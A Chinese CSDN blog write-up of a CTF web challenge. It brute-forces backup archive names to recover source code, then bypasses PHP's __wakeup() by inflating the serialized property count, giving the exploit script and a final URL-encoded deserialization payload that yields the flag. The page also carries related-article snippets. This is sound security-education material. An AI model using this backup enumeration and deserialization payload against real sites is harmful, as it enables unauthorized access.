2021-08-25 PHP(php反序列化)

最新推荐文章于 2024-09-07 15:57:32 发布
最新推荐文章于 2024-09-07 15:57:32 发布
阅读量142 收藏
点赞数
分类专栏: 笔记 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huling18/article/details/119921693
版权
本文详细介绍了PHP反序列化漏洞的利用过程,包括如何爆破备份文件,寻找可利用的代码段。在给定的代码示例中,通过构造特定的序列化字符串,绕过了__wakeup()函数的限制,成功触发了条件,获取了flag。文章还展示了构造payload的步骤,并给出了最终的攻击payload。
摘要由CSDN通过智能技术生成

PHP(php反序列化)

已进入题目就告诉我有备份,所以直接爆破备份文件
在这里插入图片描述爆破的时候就直接在网站后跟xx.xx,两个地方爆破,记得在中间加.

在这里插入图片描述常见的文件名有
web,website,backup,back,www,wwwroot,temp

在这里插入图片描述常见的后缀名有tar,tar.gz,zip,rar
在这里插入图片描述爆破后根据回显的长度判断是www.zip
在这里插入图片描述
下载备份的网站源码
在这里插入图片描述查看index.php中有这么一行,所以是get传入select值,然后反序列化

<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>

然后class.php中如下,只要满足username是admin,password是100就可以输出flag

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

可以自己构造满足条件的Name对象,但是有一个__wakeup函数,会在反序列化前自动调用,会修改username的属性值,要绕过wakeup,可以修改属性个数。所以exp如下

<?php

class Name{
    private $username;
    private $password;

    public function __construct(){
        $this->username = 'admin';
        $this->password = 100;
    }

}

$evil = new Name;
echo(serialize($evil)); 

?>

因为是private属性,会是%00类%00属性的形式,而%00是无法显示的字符,可以提前urlencode

echo(urlencode(serialize($evil)));

最后如下:

在这里插入图片描述配合上修改属性个数,payload如下:

select=O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D

得到:
在这里插入图片描述

0h0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
详细分析PHP源代码后门事件及其供应链安全启示
smellycat000的专栏
03-30 2013
聚焦源代码安全,网罗国内外最新资讯!专栏·供应链安全数字化时代,软件无处不在。软件如同社会中的“虚拟人”,已经成为支撑社会正常运转的最基本元素之一,软件的安全性问题也正在成为当今社会的根...
PHP反序列化
2ed
10-30 365
文章简介:# PHP反序列化学习笔记。 目录:# 序列化与反序列化 相关函数 1. serialize()函数 2 .unserialize()函数 序列化的不同结果 例题:D0g3CTF 总结 参考文献 序列化与反序列化# 说到反序列化,就不得不说序列化。 序列化:把对象、数组、字符串等转化为字节序列的过程称为序列化 反序列化:把字节序列恢复为对象、数组、字符串...
# php反序列化
yaoge1225的博客
07-17 87
php反序列化 PHP反序列化的漏洞,通过控制read()读取flag.php的内容。 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename =
php eval 黑客利用,代码安全审计:当file_exists遇上eval
weixin_28323057的博客
03-28 346
‍起因‍昨晚有人在一QQ群上问lcms(一款网站CMS系统)的一个漏洞是怎么形成的,说了半天。他截图不完整,于是叫他传代码,下载回来找到router.php代码片段如下:protectedfunctiongetInputString($name,$default_value="",$format="GPCS"){//orderofretrievedefaultGPCS(g...
探秘 Evil-Php:一个隐藏在代码中的安全研究工具
gitblog_00014的博客
03-28 380
探秘 Evil-Php:一个隐藏在代码中的安全研究工具 evil-phpIf you're not afraid of bugs, you can enjoy it. evil-php项目地址:https://gitcode.com/gh_mirrors/ev/evil-php 项目简介 是一个由程序员 GuoLiFu 创建的独特项目,旨在帮助开发者和安全研究员理解PHP的安全漏洞,并提供了一种...
第38天:WEB漏洞-反序列化PHP&JAVA全解(下)1
08-03
标题中的“WEB漏洞-反序列化PHP&JAVA全解(下)”指的是关于Web应用程序安全领域的一个重要话题,即PHP和JAVA平台上的反序列化漏洞。反序列化漏洞是由于程序在处理序列化数据时没有充分验证输入,从而允许攻击者构造...
64-64.渗透测试-PHP序列化与反序列化.mp4
05-10
64-64.渗透测试-PHP序列化与反序列化.mp4
php json与xml序列化/反序列化
10-26
在Web开发中,数据交换和存储常常涉及到对象的序列化和反序列化PHP提供了多种方式来处理这一过程,其中最常用的两种格式是JSON(JavaScript Object Notation)和XML(eXtensible Markup Language)。这两种格式都...
详解PHP序列化和反序列化原理
10-18
首先,要理解PHP序列化和反序列化的概念。序列化是PHP中将对象或变量的状态信息转换成可以存储或传输的形式的过程,反序列化则是将这些存储或传输后的信息还原成PHP中可以识别的对象或变量的过程。PHP通过serialize...
PHP多种序列化/反序列化的方法详解
10-19
WDDX的优势在于其XML结构使得数据可读性强,但相比JSON和PHP序列化,它的使用较少,因为其格式较复杂,且处理速度较慢。 总结: - `serialize` 和 `unserialize` 是PHP中基础且常用的序列化和反序列化工具,适用于...
php 序列化漏洞,PHP反序列化漏洞成因及漏洞挖掘技巧与案例 | ADog's Blog
weixin_32909875的博客
03-20 506
最近在深入研究php反序列化,觉得Test404这篇可能是同类当中写的最好的,不过不知道这篇出处是不是360的。。在这里转载一下以便新人学习~翻译:hac425一、序列化和反序列化序列化和反序列化的目的是使得程序间传输对象会更加方便。序列化是将对象转换为字符串以便存储传输的一种方式。而反序列化恰好就是序列化的逆过程,反序列化会将字符串转换为对象供程序使用。在PHP中序列化和反序列化对应的函数分别...
php反序列化
qq_54030686的博客
12-06 423
php反序列化 php反序列化简单的说就是魔术方法的不调用直接使用 为什么要反序列化:压缩空间,便于文件的存储 条件:存在类(class),存在魔术方法 简单理解反序列化 <?php $id=$_GET['id']; $a=serialize($id); echo $a; $b=unserialize($a); echo $b; ?> a即为序列化后的数据,b为反序列化后的数据 魔术方法,不需要引用,在符合条件下,自动执行 __construct()//创建对象时触发 new类 __destru
PHP用户自定义函数的语法结构,调用自定义函数(PHP语法)
weixin_35844772的博客
03-09 333
公共提交参数,每个命令都需要提交以下公共参数请求地址:管理后台-软件列表中获取对应软件API地址请求类型:post提交参数:data=URL编码后密文&sign=sign参数名参数说明sid软件SID,后台添加软件后获得uuid通用唯一识别码,每次必须变动,用于校验数据合法性方案之一.t客户端10位时间戳m1临时封包token(sid+key+t 拼接后取MD5值)m2当前程序MD5值,如...
通过简单案例接触PHP反序列化
bwxzdjn的博客
03-22 3741
PHP反序列化漏洞为例,理解不安全的反序列化的成因。为接下来反序列化引发的诸多场景介绍奠定基础。
2021-01-09T18:00:00.000Z格式时间存数据库,字段类型为datetime,直接出现报错
gkkljy的博客
02-09 6666
1.前端使用的elementui的<el-date-picker ,传入的时间值为2021-01-09T18:00:00.000Z格式 2.需要将格式进行转换,才能存入数据库datetime类型的字段,在后端代码写一个工具类,需要转换时直接调用就可以了 import org.apache.commons.lang3.StringUtils; import java.text.DateFormat; import java.text.ParseException; import java.text.
PHP反序列化漏洞 附题目
include_heqile的博客
09-03 672
题目一共三个文件: https://pan.baidu.com/s/1OfYZEZ7qWcv2I9OwlcU6_A 反序列化漏洞的详细说明可在这篇博客上了解到,讲解还是比较详细的: https://blog.csdn.net/qq_19876131/article/details/52890854 本题目主要就是利用HITCON和SoFun两个类中的__wakeup函数,我们可以控制HIT...
攻防世界 Web_php_unserialize
最新发布
beiweixiaotian66的博客
09-07 528
因为GET传参还要经过一个Base64的解码,所以对这个表达式还要经过base64的加密。因为前面还有个正则表达式,所以我们还需要绕过这个正则表达式,使用。然后我们知道怎么绕过了,可不可以直接自己手动绕过,base加密捏。如果表示对象属性个数的值大于真实的属性个数时,就可以绕过。代表着后面的变量名长度应是10,但好像只有八位?表示空字符,但是还是占用一个字符位置。但是这样的base和上面不一样。,这样base出来就是一样的了。方法,写一个反序列化的脚本。这道题我们需要的文件是。,所以我们主要需要绕过。
深入理解PHP反序列化机制
2. PHP序列化格式 序列化后的字符串包含了关于变量类型的元信息,每个类型都有对应的首字母缩写: - `a`: 数组 - `b`: 布尔 - `d`: 浮点数(double) - `i`: 整数 - `o`: 普通对象 - `r`: 引用 - `s`: 字符串 - `C`:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值